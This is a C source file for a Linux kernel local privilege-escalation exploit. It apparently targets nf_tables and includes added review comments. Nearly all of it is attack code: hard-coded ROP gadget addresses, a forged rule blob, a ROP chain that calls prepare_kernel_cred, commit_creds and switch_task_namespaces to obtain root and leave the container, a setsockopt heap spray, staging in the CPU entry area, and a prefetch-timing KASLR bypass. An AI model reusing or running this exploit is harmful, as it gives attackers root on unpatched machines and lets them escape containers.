#define _GNU_SOURCE
// Short integer aliases used throughout this file.
// NOTE(review): the widths suggested by the names (8/16/32/64 bit) hold on
// LP64 Linux/x86-64; the C standard itself does not guarantee them.
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
// NOTE(review): plain `char` has implementation-defined signedness, so i8 is
// only a signed type on targets where `char` is signed.
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;


// Error-handling helpers.
//
// FAIL_IF(x):  if `x` is true, print the stringified expression together with
//              the current errno text (perror) and make the *enclosing
//              function* return -1.
// PANIC_IF(x): if `x` is true, print the same diagnostic and terminate the
//              process with errno as the exit status.
//
// Both are wrapped in do { ... } while (0) so that `MACRO(cond);` is exactly
// one statement and can be used safely as the body of an unbraced if/else.
#define FAIL_IF(x) do { \
    if ((x)) { \
        perror(#x); \
        return -1; \
    } \
} while (0)
#define PANIC_IF(x) do { \
    if ((x)) { \
        perror(#x); \
        exit(errno); \
    } \
} while (0)
// Number of elements of a true array (not valid for pointers). The argument
// is parenthesized so that arbitrary array expressions can be passed.
#define ARRAY_LEN(x) (sizeof(x) / sizeof((x)[0]))

// Restrict the task identified by getpid() to CPU number `id`.
// Returns whatever sched_setaffinity() returns (0 on success, -1 with errno
// set on failure).
static inline int _pin_to_cpu(int id) {
  cpu_set_t allowed;

  CPU_ZERO(&allowed);
  CPU_SET(id, &allowed);

  return sched_setaffinity(getpid(), sizeof(allowed), &allowed);
}



//
// offsets
//
// Every constant in this section is a kernel virtual address expressed
// relative to the default kernel base 0xffffffff81000000; all users add the
// slide returned by bypass_kaslr() (`kernel_off`) before use.
// NOTE(review): the values are tied to one specific kernel build and have to
// be regenerated for any other image.
//

// ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 	4c57ff660f
#define PUSH_RDI_JMP_RSI_0XF 0xffffffff81e09097
// ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5c4883c4205be94c6d1901c3
#define POP_RSP_ADD_RSP_0X20_POP_RBX_RET 0xffffffff8126df29
// ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ae9223a1b01c3
#define POP_RDX_RET 0xffffffff81251258
// ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5de9c6cbbe00c3
#define POP_RBP_RET 0xffffffff818180b4
// ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	59e95ec53d01c3
#define POP_RCX_RET 0xffffffff8102871c
// ffffffff818344a5: push rax; jmp qword ptr [rcx]; 	50ff21
#define PUSH_RAX_JMP_RCX 0xffffffff818344a5
// ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 	5cff660f
#define POP_RSP_JMP_RSI_0XF 0xffffffff81dadf48
// ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	498d042c5b5d415c415d415ee9d6bb8300c3
#define LEA_RAX_R12_PLUS_RBP_POP5_RET 0xffffffff81bc9099
// ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5fe912bb1001c3
#define POP_RDI_RET 0xffffffff812f9168
// ffffffff8124f56d:       48 89 c7                mov    %rax,%rdi
// ffffffff8124f570:       48 89 3d d1 b9 23 03    mov    %rdi,0x323b9d1(%rip)        # ffffffff8448af48 <vmcoreinfo_data_safecopy>
// ffffffff8124f577:       e9 04 57 1b 01          jmp    ffffffff82404c80 <__x86_return_thunk>
// (besides moving rax into rdi this gadget also stores rdi to the global
// shown in the disassembly above)
#define MOV_RDI_RAX_RET 0xffffffff8124f56d
// ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ee932358300c3
#define POP_RSI_RET 0xffffffff81bd1748
// function trailer for nft_do_chain
#define NFT_DO_CHAIN_LEAVE 0xffffffff81e517eb
// we use this for the fast path to copy some data from the skb into RSI
#define NFT_PAYLOAD_FAST_OPS 0xffffffff82b27580
// Kernel functions and data objects referenced by name from the chain built
// in setup_rop_chain().
#define FIND_TASK_BY_VPID 0xffffffff811bbe60
#define SWITCH_TASK_NAMESPACES 0xffffffff811c3a30
#define COMMIT_CREDS 0xffffffff811c55a0
#define PREPARE_KERNEL_CRED 0xffffffff811c5840
#define INIT_TASK 0xffffffff83815a40
#define INIT_NSPROXY 0xffffffff83876720
// ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	4881c488000000e997903101c3
#define ADD_RSP_0X88_RET 0xffffffff810ebbdd


//
//
//

// KASLR bypass based on a timing side channel (defined further down in this file).
int64_t bypass_kaslr(u64 base);

// CPU entry area pointers. We prepare some memory here that will be referenced
// by the ROP chains.
// We need:
//  - the struct nft_expr_ops { .eval } member
//  - a pivot gadget to restore the stack
//  - and a pointer to the nft_do_chain function trailer so that we jump to it.
//
// CPU_ENTRY_AREA_BASE(cpu): address derived from a fixed base plus a per-CPU
//   stride of 0x3b000 bytes. The argument is parenthesized so that compound
//   expressions such as `cpu + 1` are scaled as a whole.
// PAYLOAD_LOCATION(cpu): CPU_ENTRY_AREA_BASE(cpu) + 0x1f58, the address the
//   rest of the file treats as the start of struct cpu_entry_area_payload.
// NOTE(review): base, stride and the 0x1f58 offset are layout constants of
//   the targeted kernel build — confirm before reusing elsewhere.
#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (u64)(cpu) * 0x3b000)
#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58)
// CPU indices used by this file (MAIN_CPU is only referenced from a
// commented-out pin call in sandbox(); HELPER_CPU hosts the helper process).
#define MAIN_CPU 0
#define HELPER_CPU 1

// Block of 16 eight-byte slots that write_cpu_entry_area() loads into the
// general purpose registers (it pops 15 values starting at the object's
// address, so slot 0 ends up in r15, slot 1 in r14, slot 2 in r13, ...).
// The named members alias regs[0..2]; other code refers to them through
// PAYLOAD_LOCATION(cpu) + offsetof(struct cpu_entry_area_payload, member).
struct cpu_entry_area_payload {
  union {
    struct {
      // function to call to evaluate the expression
      u64 nft_expr_eval;
      // stack pivot gadget to go back to normal execution
      u64 pop_rsp_jmp_rsi_0xf;
      // nft_do_chain jump target to restore execution
      u64 nft_do_chain_leave;
    };
    // raw view of all slots; entries beyond the three named ones stay zero
    // in this file
    u64 regs[16];
  };
};


// Our payload which will reclaim the object in chain->{blob_gen_1,blob_gen_0}.
// This is essentially a struct nft_rule_blob with a single rule.
// This rule then has 4 expressions (3 x fast_exprs + 1 x fake_expr) which will
// run our payload.
struct payload {

  //
  // note that we omit a hole of ~60 bytes which is all zero
  //

  // rule data (1 rule); filled in by setup_registers()
  u64 is_last:1, dlen:12, handle:42;

  // We use this to set up the regs argument passed to our following fake_expr in RSI.
  // Essentially these exprs will copy data from the packet into the regs.
  // We need it for our stack pivot.
  // Each element is packed to 16 bytes (8 + 4 x 1 + 4); the array itself is
  // aligned like a u64.
  struct {
    u64 fast_ops;   // address of the ops table (kernel_off + NFT_PAYLOAD_FAST_OPS)
    u8 base;        // payload base selector
    u8 offset;      // byte offset of the source data
    u8 len;         // number of bytes to copy
    u8 dreg;        // destination register index
    u32 __padding;
  } __attribute__((__packed__)) fast_exprs[3] __attribute__((aligned(__alignof__(u64))));

  // Actual call into our rop chain
  struct {
    u64 fake_ops;         // pointer used as the expression's ops table
    u64 rop_chain[128];   // slots filled by setup_rop_chain()
  } fake_expr;
};

// 24 bytes of register-image data; setup_registers() stores a gadget address
// at byte offset 0xF and derives the fast_exprs entries from the non-zero
// 32-bit words.
static u32 rop_chain_rsi[6] = {};
// File-scope payload instance; spray_payload() copies it into payload_page.
// Note that several functions take a parameter of the same name.
static struct payload payload = {};

// Fill in the rule header and the fast_exprs[] entries of `payload`.
//
//   payload    - object to fill (the parameter shadows the file-scope
//                `payload` variable)
//   kernel_off - KASLR slide added to every kernel address
//
// Also writes into the file-scope rop_chain_rsi buffer.
void setup_registers(struct payload* payload, int64_t kernel_off) {
  // this function sets up the part of the payload which sets up the nft_regs structure
  // in nft_do_chain.
  // essentially we copy a stack pivot gadget into them
  // the payload will be copied directly from the packet we send to trigger the payload

  // Place the 8-byte pivot gadget address at byte offset 0xF, matching the
  // `[rsi+0xf]` operand of the *_JMP_RSI_0XF gadgets.
  // NOTE(review): this is an unaligned, type-punned store through a u64*;
  // it is tolerated on x86-64 but is undefined behaviour in ISO C — a
  // memcpy() would be the portable spelling.
  *(u64*)((u8*)rop_chain_rsi + 0xF) = kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET;
  const u32* regs = rop_chain_rsi;
  int j = 0;
  // Emit one copy expression per non-zero 32-bit word. Bytes 15..22 only
  // overlap words 3, 4 and 5, so at most three entries are produced, which
  // is the capacity of fast_exprs[]; there is no explicit bound check on j.
  for (int i = 0; i < 6; i++) {
    if (regs[i] == 0) {
      continue;
    }

    payload->fast_exprs[j].fast_ops = kernel_off + NFT_PAYLOAD_FAST_OPS;
    payload->fast_exprs[j].base = NFT_PAYLOAD_NETWORK_HEADER;
    // offset of our skb payload data
    payload->fast_exprs[j].offset = 0x1c + i * 4;
    payload->fast_exprs[j].len = 4;
    payload->fast_exprs[j].dreg = i;

    j++;
  }

  // Rule header: dlen covers everything from fast_exprs to the end of the
  // struct.
  payload->is_last = 0;
  payload->dlen = sizeof(struct payload) - offsetof(struct payload, fast_exprs);
  payload->handle = 0xDEAD;
}

// Fill payload->fake_expr: the ops pointer and the return-oriented chain.
//
//   payload    - object to fill (shadows the file-scope `payload`)
//   kernel_off - KASLR slide added to every kernel text/data address
//
// Slots are written strictly in order through the running index `i`; slots
// that are skipped keep whatever value the caller's object already holds
// (zero for the file-scope instance). The last slot written is index 102 of
// the 128 available.
void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
  payload->fake_expr.fake_ops = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);

  // the top of the stack contains &payload->fake_expr
  // we jump into this using this gadget:
  // pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret;

  u64* rop_chain = payload->fake_expr.rop_chain;
  // first used slot: index 4, i.e. byte offset 0x28 from the start of
  // fake_expr (8 bytes of fake_ops + 4 slots)
  int i = 0x20 / 8;

  // had some issue with object boundaries. Lets get some more stack space ..
  // (each gadget skips 0x88 bytes = 17 slots, mirrored by the index bump)
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;

  // rdi = INIT_TASK; call PREPARE_KERNEL_CRED
  rop_chain[i++] = kernel_off + POP_RDI_RET;
  rop_chain[i++] = kernel_off + INIT_TASK;
  rop_chain[i++] = kernel_off + PREPARE_KERNEL_CRED;

  // rdi = rax (previous return value); call COMMIT_CREDS
  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
  rop_chain[i++] = kernel_off + COMMIT_CREDS;

  // rdi = 1; call FIND_TASK_BY_VPID
  rop_chain[i++] = kernel_off + POP_RDI_RET;
  rop_chain[i++] = 1;
  rop_chain[i++] = kernel_off + FIND_TASK_BY_VPID;

  // rdi = rax, rsi = INIT_NSPROXY; call SWITCH_TASK_NAMESPACES
  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
  rop_chain[i++] = kernel_off + POP_RSI_RET;
  rop_chain[i++] = kernel_off + INIT_NSPROXY;
  rop_chain[i++] = kernel_off + SWITCH_TASK_NAMESPACES;

  // prepare to restore execution
  // nft_do_chain:
  //   entry:
  //     sub 0x220 rsp
  //     lea r12, [rsp+0x48]
  //   exit:
  //     ffffffff81e517eb: 89 d0   mov    %edx,%eax
  // rax = r12 + (0x220 - 0x48); the gadget then pops five more registers,
  // hence the five skipped slots.
  rop_chain[i++] = kernel_off + POP_RBP_RET;
  rop_chain[i++] = 0x220 - 0x48;
  rop_chain[i++] = kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET;
  i += 5;

  // prepare the stack restore gadget
  rop_chain[i++] = kernel_off + POP_RCX_RET;
  rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, pop_rsp_jmp_rsi_0xf);

  // prepare the return jmp gadget
  // (the -0xf compensates for the `[rsi+0xf]` operand of the pivot gadget)
  rop_chain[i++] = kernel_off + POP_RSI_RET;
  rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_do_chain_leave) - 0xf;

  // set up the return value
  rop_chain[i++] = kernel_off + POP_RDX_RET;
  rop_chain[i++] = NF_DROP;

  // actually restore execution
  rop_chain[i++] = kernel_off + PUSH_RAX_JMP_RCX;
}


// Signal handler that deliberately does nothing; it is installed by
// setup_cpu_entry_area() so that the handled signals do not terminate the
// process.
static void sig_handler(int s) {
  (void)s;
}

// Load 15 eight-byte values starting at `payload` into the general purpose
// registers and then execute a division with a memory operand at the fixed
// address 0x1234000. Never returns: the instruction sequence ends in an
// endless loop.
//
// NOTE(review): the division is presumably expected to raise a CPU exception
// so that the register contents get saved by the kernel (see the comment on
// setup_cpu_entry_area); whether 0x1234000 is mapped is decided outside this
// chunk.
// NOTE(review): rsp is overwritten and no clobbers are declared; this is
// only acceptable because control never returns to compiled code.
static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
  asm volatile (
	  // use the payload object as the stack so it can be popped
	  "mov %0, %%rsp\n"
	  // slot 0 -> r15, slot 1 -> r14, ... slot 14 -> rdi
	  "pop %%r15\n"
	  "pop %%r14\n"
	  "pop %%r13\n"
	  "pop %%r12\n"
	  "pop %%rbp\n"
	  "pop %%rbx\n"
	  "pop %%r11\n"
	  "pop %%r10\n"
	  "pop %%r9\n"
	  "pop %%r8\n"
	  "pop %%rax\n"
	  "pop %%rcx\n"
	  "pop %%rdx\n"
	  "pop %%rsi\n"
	  "pop %%rdi\n"
	  "divq (0x1234000)\n"
    // spin forever if execution ever continues past the division
    "1:\n"
    "jmp 1b\n"
    : : "r"(payload)
  );
  __builtin_unreachable();
}

// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
//
// Forks a helper process. The parent returns immediately; the child pins
// itself to HELPER_CPU, installs the empty sig_handler for SIGFPE, SIGTRAP
// and SIGSEGV, starts a new session and never returns from
// write_cpu_entry_area().
//
//   kernel_off - KASLR slide added to the three gadget addresses
//
// NOTE(review): a failing fork() returns -1, which is non-zero and therefore
// takes the parent path — the failure is not reported.
static void setup_cpu_entry_area(int64_t kernel_off) {
  if (fork()) {
    return;
  }

  // local object, distinct from the file-scope `payload` of another type
  struct cpu_entry_area_payload payload = {};
  payload.nft_expr_eval = kernel_off + PUSH_RDI_JMP_RSI_0XF;
  payload.pop_rsp_jmp_rsi_0xf = kernel_off + POP_RSP_JMP_RSI_0XF;
  payload.nft_do_chain_leave = kernel_off + NFT_DO_CHAIN_LEAVE;

  PANIC_IF(_pin_to_cpu(HELPER_CPU) < 0);
  PANIC_IF(signal(SIGFPE, sig_handler) == SIG_ERR);
  PANIC_IF(signal(SIGTRAP, sig_handler) == SIG_ERR);
  PANIC_IF(signal(SIGSEGV, sig_handler) == SIG_ERR);
  PANIC_IF(setsid() == -1);

  write_cpu_entry_area(&payload);
}


// Staging buffer for spray_payload(). It is NULL here and must be assigned
// before spray_payload() is called.
// NOTE(review): the assignment is not part of this chunk; the EFAULT
// expectation below suggests that only the first 0x1000 bytes are readable —
// confirm against the code that sets it up.
static void* payload_page = NULL;

// Copy a struct ipt_replace header followed by the file-scope `payload` into
// payload_page and submit it eight times via IPT_SO_SET_REPLACE.
//
//   fd - socket the setsockopt() calls are issued on
//
// Returns 0 when every call failed with EFAULT (the expected outcome) and -1
// as soon as one call succeeds or fails with a different errno.
//
// NOTE(review): `payload_page + sizeof(replace)` is arithmetic on void*, a
// GNU C extension.
int spray_payload(int fd) {
  struct ipt_replace replace = {};
  // into dyn-kmalloc-8k-cg please
  replace.size = 0x1000 + 1;
  // need this to make the allocation
  replace.num_counters = 1;

  memcpy(payload_page, &replace, sizeof(replace));
  _Static_assert(sizeof(replace) + sizeof(payload) <= 0x1000, "payload does not fit into one page");
  memcpy(payload_page + sizeof(replace), &payload, sizeof(payload));

  for (int i = 0; i < 8; i++) {
    // this faults during the copy_from_user call, immediately frees our payload again,
    // but that is enough for us
    if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, payload_page, 0x1000 * 2) == 0 || errno != EFAULT) {
      printf("spray payload: setsockopt(): unexpected error?\n");
      return -1;
    }
  }

  return 0;
}


// Send `size` bytes starting at `nlh` as one message on socket `fd`.
// Returns 0 on success; on failure reports the sendmsg() error through
// perror() and returns -1.
int __netlink_send(int fd, const void* nlh, size_t size) {
    struct iovec segment = {
        .iov_base = (void*)nlh,
        .iov_len = size,
    };
    // All members not named here (name, control data, flags) are zero.
    struct msghdr request = {
        .msg_iov = &segment,
        .msg_iovlen = 1,
    };

    if (sendmsg(fd, &request, 0) >= 0) {
        return 0;
    }

    perror("sendmsg()");
    return -1;
}

// Receive one message from `fd` into the buffer `nlh` of capacity `size`.
//
// The buffer is zeroed first. A non-blocking peek with MSG_TRUNC determines
// the length of the pending message; the message is then read with a
// receive sized exactly to that length.
//
// Returns the result of the final recvmsg(), 0 if nothing is pending
// (EAGAIN on the peek), or -1 on error or if the message does not fit.
int netlink_recv(int fd, void* nlh, size_t size) {
    struct msghdr msg = {
        .msg_flags = MSG_TRUNC,
    };

    memset(nlh, 0, size);

    // Probe: no iovec attached, so nothing is consumed or copied.
    const ssize_t pending = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT);
    if (pending < 0) {
        if (errno != EAGAIN) {
            perror("recvmsg()");
            return -1;
        }
        return 0;
    }

    const size_t needed = (size_t)pending;
    if (needed > size) {
        fprintf(stderr, "message too large: %zu > %zu\n", needed, size);
        return -1;
    }

    struct iovec iov = {
        .iov_base = (void*)nlh,
        .iov_len = needed,
    };
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    return recvmsg(fd, &msg, 0);
}

// Extract the error code from a netlink acknowledgement.
//
// Returns 0 when the header has a zero length (nothing was received) or when
// the message is not of type NLMSG_ERROR (a warning is printed in that
// case). Otherwise returns the `error` field of the embedded nlmsgerr, and
// when that field is non-zero also stores its negation in errno.
int netlink_errno(const struct nlmsghdr* nlh) {
    if (nlh->nlmsg_len == 0) {
        return 0;
    }

    if (nlh->nlmsg_type != NLMSG_ERROR) {
        fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type);
        return 0;
    }

    const struct nlmsgerr* report = NLMSG_DATA(nlh);
    const int code = report->error;
    if (code != 0) {
        errno = -code;
    }
    return code;
}

// Create an AF_NETLINK raw socket for protocol `proto` and bind it to a
// zeroed netlink address (only nl_family is set).
//
// Returns the socket descriptor on success. On failure the error is reported
// through perror() and a negative value is returned; a socket that was
// created but could not be bound is closed again so that no descriptor
// leaks.
int netlink_open(int proto) {
    struct sockaddr_nl addr = {0};
    addr.nl_family = AF_NETLINK;

    int s = socket(AF_NETLINK, SOCK_RAW, proto);
    if (s < 0) {
        perror("socket()");
        return s;
    }
    if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        // report first: close() below may overwrite errno
        perror("bind()");
        close(s);
        return -1;
    }

    return s;
}

// Send a complete netlink message; the length is taken from the header's
// nlmsg_len field.
static inline int netlink_send(int fd, const struct nlmsghdr* nlh) {
    const size_t total = nlh->nlmsg_len;

    return __netlink_send(fd, nlh, total);
}

// Send an RTM_NEWLINK request for interface `ifindex` on the netlink socket
// `s` and wait for the acknowledgement.
//
//   ifi_flags - value placed in the request's ifi_flags field; the change
//               mask is fixed to 1, so only the lowest flag bit is affected
//
// Returns 0 on success and -1 (after a perror() diagnostic) if sending,
// receiving or the acknowledged error code indicates a failure.
int ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags) {
    u8 buf[1024] = {0};
    struct nlmsghdr* nlh = (void*)buf;
    struct ifinfomsg* ifi = NLMSG_DATA(nlh);

    // netlink header
    nlh->nlmsg_type = RTM_NEWLINK;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = 0;
    nlh->nlmsg_len = sizeof(*ifi) + NLMSG_HDRLEN;

    // link message body
    ifi->ifi_family = PF_UNSPEC;
    ifi->ifi_type = 0;
    ifi->ifi_index = ifindex;
    ifi->ifi_flags = ifi_flags;
    ifi->ifi_change = 1;

    // The same buffer is reused for the reply.
    FAIL_IF(netlink_send(s, nlh) < 0);
    FAIL_IF(netlink_recv(s, nlh, sizeof(buf)) < 0);
    FAIL_IF(netlink_errno(nlh) != 0);
    return 0;
}


// Move the process into new user and network namespaces and set the IFF_UP
// flag on interface index 1 (per the inline note, the loopback device).
// Every step is wrapped in PANIC_IF, so any failure prints the failing
// expression and terminates the process.
void sandbox() {
  // pinning to MAIN_CPU is currently disabled
  //PANIC_IF(_pin_to_cpu(MAIN_CPU) < 0);
  PANIC_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET));

  // temporary rtnetlink socket, only needed for the link-up request
  int s;
  PANIC_IF((s = netlink_open(NETLINK_ROUTE)) < 0);
  PANIC_IF(ip_link_set_flags(s, 1 /* if_nametoindex("lo") */, IFF_UP));
  close(s);
}

// KASLR bypass
//
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
//
// Read the time-stamp counter at the start of a timed region.
// Instruction order: mfence, RDTSCP, copy rdx/rax to the outputs, clear rax,
// lfence. Returns the counter as (high << 32) | low.
// NOTE(review): rbx is listed as clobbered although no instruction shown
// here writes it — presumably inherited from the code this was adapted from.
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  // combine the high (d) and low (a) halves
  a = (d<<32) | a;
  return a;
}

// Read the time-stamp counter at the end of a timed region.
// Mirror image of rdtsc_begin(): clear rax, lfence, RDTSCP, copy rdx/rax to
// the outputs, mfence. Returns the counter as (high << 32) | low.
inline __attribute__((always_inline)) uint64_t rdtsc_end() {
  uint64_t a, d;
  asm volatile(
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "mfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  // combine the high (d) and low (a) halves
  a = (d<<32) | a;
  return a;
}


// Issue two prefetch hints (prefetchnta followed by prefetcht2) for the
// address `p`. The pointer is only used as an instruction operand; the
// function does not read or write through it in C.
void prefetch(void* p)
{
  asm volatile (
    "prefetchnta (%0)\n"
    "prefetcht2 (%0)\n"
    : : "r" (p));
}

// Time a prefetch of `addr`: returns the difference between the counter
// values read directly before and directly after the prefetch() call.
// (Despite the name, no cache flush or reload takes place here.)
size_t flushandreload(void* addr)
{
  const size_t started = rdtsc_begin();

  prefetch(addr);

  return rdtsc_end() - started;
}

// Determine the kernel base address and return its distance from the default
// base 0xffffffff81000000.
//
//   base - if non-zero it is taken as the kernel base and no measurement is
//          done; if zero the base is estimated from prefetch timings.
//
// Estimation: candidate addresses between START and END (spaced STEP apart)
// are timed with flushandreload() in 16 passes, keeping the minimum time per
// candidate. One base is derived per trial, several trials are collected in
// bases[], and a base is accepted once more than half of the trials agree;
// otherwise the whole procedure is repeated.
//
// Two variants are selected at compile time via KASLR_BYPASS_INTEL.
// The START/END/STEP/... macros are defined inside the function body and stay
// defined for the remainder of the translation unit.
int64_t bypass_kaslr(u64 base) {
    if (!base) {
      #ifdef KASLR_BYPASS_INTEL
        // Variant 1: 16 MiB steps; the candidate with the smallest minimum
        // time wins a trial.
        #define OFFSET 0
        #define START (0xffffffff81000000ull + OFFSET)
        #define END   (0xffffffffD0000000ull + OFFSET)
        #define STEP   0x0000000001000000ull
        while (1) {
            u64 bases[7] = {0};
            for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
                size_t times[(END - START) / STEP] = {};
                uint64_t addrs[(END - START) / STEP];

                // start every slot at the largest value so the first sample wins
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    times[ti] = ~0;
                    addrs[ti] = START + STEP * (u64)ti;
                }

                // 16 passes over all candidates, keeping the per-slot minimum
                for (int i = 0; i < 16; i++) {
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    u64 addr = addrs[ti];
                    size_t t = flushandreload((void*)addr);
                    if (t < times[ti]) {
                        times[ti] = t;
                    }
                }
                }

                // pick the fastest slot (the last slot is not considered)
                size_t minv = ~0;
                size_t mini = -1;
                for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
                    if (times[ti] < minv) {
                        mini = ti;
                        minv = times[ti];
                    }
                }

                // NOTE(review): `mini` is a size_t, so this comparison is
                // never true and the early return is unreachable.
                if (mini < 0) {
                    return -1;
                }

                bases[vote] = addrs[mini];
            }

            // Candidate selection.
            // NOTE(review): `c` is never incremented when a candidate is
            // adopted, so it stays 0 and `base` ends up as the last trial's
            // value; the counting loop below still validates the majority.
            int c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (c == 0) {
                base = bases[i];
              } else if (base == bases[i]) {
                c++;
              } else {
                c--;
              }
            }

            // count how many trials agree with the candidate
            c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (base == bases[i]) {
                c++;
              }
            }
            if (c > ARRAY_LEN(bases) / 2) {
              base -= OFFSET;
              goto got_base;
            }

            printf("majority vote failed:\n");
            printf("base = %llx with %d votes\n", base, c);
        }
      #else
        // Variant 2: 2 MiB steps; a trial picks the start of the window of
        // WINDOW_SIZE consecutive slots whose summed minimum times are
        // largest.
        #define START (0xffffffff81000000ull)
        #define END (0xffffffffc0000000ull)
        #define STEP 0x0000000000200000ull
        #define NUM_TRIALS 7
        // largest contiguous mapped area at the beginning of _stext
        #define WINDOW_SIZE 11

        while (1) {
            u64 bases[NUM_TRIALS] = {0};

            for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
                size_t times[(END - START) / STEP] = {};
                uint64_t addrs[(END - START) / STEP];

                // start every slot at the largest value so the first sample wins
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    times[ti] = ~0;
                    addrs[ti] = START + STEP * (u64)ti;
                }

                // 16 passes over all candidates, keeping the per-slot minimum
                for (int i = 0; i < 16; i++) {
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    u64 addr = addrs[ti];
                    size_t t = flushandreload((void*)addr);
                    if (t < times[ti]) {
                        times[ti] = t;
                    }
                }
                }

                // sliding window: remember the first window with the largest sum
                uint64_t max = 0;
                int max_i = 0;
                for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
                    uint64_t sum = 0;
                    for (int i = 0; i < WINDOW_SIZE; i++) {
                        sum += times[ti + i];
                    }
                    if (sum > max) {
                        max = sum;
                        max_i = ti;
                    }
                }

                bases[vote] = addrs[max_i];
            }

            // Candidate selection.
            // NOTE(review): `c` is never incremented when a candidate is
            // adopted, so it stays 0 and `base` ends up as the last trial's
            // value; the counting loop below still validates the majority.
            int c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (c == 0) {
                base = bases[i];
              } else if (base == bases[i]) {
                c++;
              } else {
                c--;
              }
            }

            // count how many trials agree with the candidate
            c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (base == bases[i]) {
                c++;
              }
            }
            if (c > ARRAY_LEN(bases) / 2) {
              goto got_base;
            }

            printf("majority vote failed:\n");
            printf("base = %llx with %d votes\n", base, c);
        }
      #endif
    }

got_base:
    printf("using kernel base %llx\n", base);

    // slide relative to the default (non-randomized) base
    i64 off = base - 0xffffffff81000000;
    printf("kernel off: %lld\n", off);

    return off;
    
}
